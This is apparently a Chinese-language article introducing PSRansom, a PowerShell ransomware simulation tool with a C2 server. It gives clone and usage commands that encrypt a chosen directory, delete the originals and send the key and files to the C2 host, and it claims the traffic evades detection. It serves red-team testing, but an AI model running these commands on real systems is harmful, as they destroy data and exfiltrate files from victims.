关于PSRansomPSRansom是一款具有C2服务器功能的PowerShell勒索软件模拟工具,可以帮助研究人员模拟任何操作系统平台(只要安装了PowerShell)的通用勒索软件数据加密过程。借助C2服务器功能,我们甚至可以通过HTTP从目标设备(客户端)提取文件,并在服务器端接收信息。客户端与服务端的通信数据经过加密编码,无法被基于流量审计的检测工具检测到。该工具需要PowerShell4.0或更高版本才能下载该工具。研究人员可以使用以下命令将项目源码克隆到本地:gitclonehttps://github.com/JoelGMSec/PSRansom或直接访问项目[Releasespage]下载压缩包工具的文件。下载完成后,我们会得到两个脚本:PSRansom和C2Server。第一个将模拟勒索软件感染,而第二个将负责恢复文件及其恢复密钥。工具使用该工具的使用非常简单,我们只需要指明要加密的目录,C2服务器的IP或主机名以及接收连接的端口即可。另外,如果我们需要发送加密文件,需要在命令末尾加上-x参数选项。解密时,只需指定目录和恢复密钥即可。工具使用示例首先,我们的测试场景定义如下:勒索软件将在Windows机器上运行我们要加密的文件夹位于C:\BackupC2服务器将在KaliLinux上运行所有流量都将通过代理查看详细信息接下来看看该工具提供了哪些操作选项:命令控制服务器的使用也很简单,我们只需要指定监听连接的端口和接收连接的端口即可。在这里,我们使用端口80:pwshC2Server.ps1+80接下来,我们将使用以下命令运行加密和渗漏:.\PSRansom.ps1-edirectory-sServerC2-pport-x此时将生成24字母数字字符(小写、大写和数字)的随机密钥,数据将使用AES256加密,恢复密钥将发送到C2服务器。完成后,原始文件将被删除,只保留加密文件:服务器端将收到如下图所示的内容:现在,我们将收到目标设备的信息、恢复密钥、加密文件列表,服务器端等:许可协议本项目的开发和发布遵循GPL-3.0开源许可协议。项目地址PSRansom:【GitHub传送门】
